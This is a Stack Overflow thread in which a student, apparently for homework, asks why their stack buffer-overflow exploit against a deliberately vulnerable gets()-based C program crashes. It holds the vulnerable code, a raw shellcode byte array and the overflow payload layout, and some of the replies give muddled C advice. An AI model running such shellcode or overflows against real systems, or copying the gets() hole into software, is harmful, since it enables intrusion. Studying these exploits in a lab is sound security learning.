# immunity debugger err : "access violation when reading [90909090]"

Tags: c

I'm getting this error in immunity debugger:

> access violation when reading [90909090]

I want to exploit a simple c code: I give it a long input to rewrite return address, when it jumps to the new return address and starts running my shellcode, I get the error.

Here is my c code:

```
#include <stdio.h>

int main(int argc ,char** argv)
{
    int cookie;
    char buffer[300];
    printf(" buffer : %08x\r\n",&buffer);
    gets(buffer);
    return 0;
}
```

and this is my shellcode:

```
0xbd,0xec,0xf4,0xe7,0x5a,0xdb,0xd2,0xd9,0x74,0x24,0xf4,0x58,
0x31,0xc9,0xb1,0x32,0x31,0x68,0x12,0x03,0x68,0x12,0x83,0x2c,
0xf0,0x05,0xaf,0x50,0x11,0x40,0x50,0xa8,0xe2,0x33,0xd8,0x4d,
0xd3,0x61,0xbe,0x06,0x46,0xb6,0xb4,0x4a,0x6b,0x3d,0x98,0x7e,
0xf8,0x33,0x35,0x71,0x49,0xf9,0x63,0xbc,0x4a,0xcf,0xab,0x12,
0x88,0x51,0x50,0x68,0xdd,0xb1,0x69,0xa3,0x10,0xb3,0xae,0xd9,
0xdb,0xe1,0x67,0x96,0x4e,0x16,0x03,0xea,0x52,0x17,0xc3,0x61,
0xea,0x6f,0x66,0xb5,0x9f,0xc5,0x69,0xe5,0x30,0x51,0x21,0x1d,
0x3a,0x3d,0x92,0x1c,0xef,0x5d,0xee,0x57,0x84,0x96,0x84,0x66,
0x4c,0xe7,0x65,0x59,0xb0,0xa4,0x5b,0x56,0x3d,0xb4,0x9c,0x50,
0xde,0xc3,0xd6,0xa3,0x63,0xd4,0x2c,0xde,0xbf,0x51,0xb1,0x78,
0x4b,0xc1,0x11,0x79,0x98,0x94,0xd2,0x75,0x55,0xd2,0xbd,0x99,
0x68,0x37,0xb6,0xa5,0xe1,0xb6,0x19,0x2c,0xb1,0x9c,0xbd,0x75,
0x61,0xbc,0xe4,0xd3,0xc4,0xc1,0xf7,0xbb,0xb9,0x67,0x73,0x29,
0xad,0x1e,0xde,0x27,0x30,0x92,0x64,0x0e,0x32,0xac,0x66,0x20,
0x5b,0x9d,0xed,0xaf,0x1c,0x22,0x24,0x94,0xd3,0x68,0x65,0xbc,
0x7b,0x35,0xff,0xfd,0xe1,0xc6,0xd5,0xc1,0x1f,0x45,0xdc,0xb9,
0xdb,0x55,0x95,0xbc,0xa0,0xd1,0x45,0xcc,0xb9,0xb7,0x69,0x63,
0xb9,0x9d,0x09,0xe2,0x29,0x7d,0xce
```

shell has 224 byte length and return address is on offset 312, so my input has this format:

```
shellcode+'\x90'*88+ReturnAddress
```

Comment: In your shellcode I noticed a "missing" (,) in the second row in the middle. is it supposed to miss that one?  Or did it just get lost during the copy/paste process? I hope you dont mind me formating the "Shell code"

Comment: Oo, hold on, if that error exists in the original code, I suspect it will cause problems.

Comment: @DavidRobertsson - As far as I could tell, the comma was mistakenly removed by you: http://stackoverflow.com/posts/17923253/revisions I corrected that while approving the edit, and made some more changes. If I made a mistake please let me know, or submit another edit. Thanks!

Comment: You are correct. Thank you kobi for the clarification.

Answer (score 2):

`printf()` statement is wrong in your code, an `&` nut needed:

```
printf(" buffer : %08x\r\n", &buffer);
                             ^   remove
```

Next, you `char buffer[300];` has garbage values, even if you remove `&`, it will cause an Undefined behavior.

Note: as David RF noticed you are using `gets()` that is deprecated. You should use [`char * fgets ( char * str, int num, FILE * stream );`](http://www.cplusplus.com/reference/cstdio/fgets/?kw=fgets) function instead to avoid buffer-overflow attack.

bwt, Its first time I am reading a program in which buffer is printf before reading from user! (Why so?)

Comment: +1, furthermore is printing the value of an uninitialized buffer, must `gets` (deprecated, use `fgets` instead) before the print

Comment: @Sani as I said your `buffer[]` contains garbage values, that may be reason of  buffer overflow

Comment: exactly ! i want to do this (buffer-overflow attack) ,

Comment: this is my homework , i should attack to a simple c code and run my own code

Comment: i put printf because i want to see the address of buffer that my shellcode shoud be injected to

Comment: @Sani Ok what is your next question? this output is due to buffer-overflow.

Comment: i don't know about this err , how can i pass it

Comment: my problem is about my shellcode , when ip jumps to start of my shellcode and runs it , i see this err

Comment: @Sani remove `&` , then use `fget()` that is your answer, to simulate buffer overflow pass length fget > buffer size, additionally to simulate buffer-overflow use small size buffer.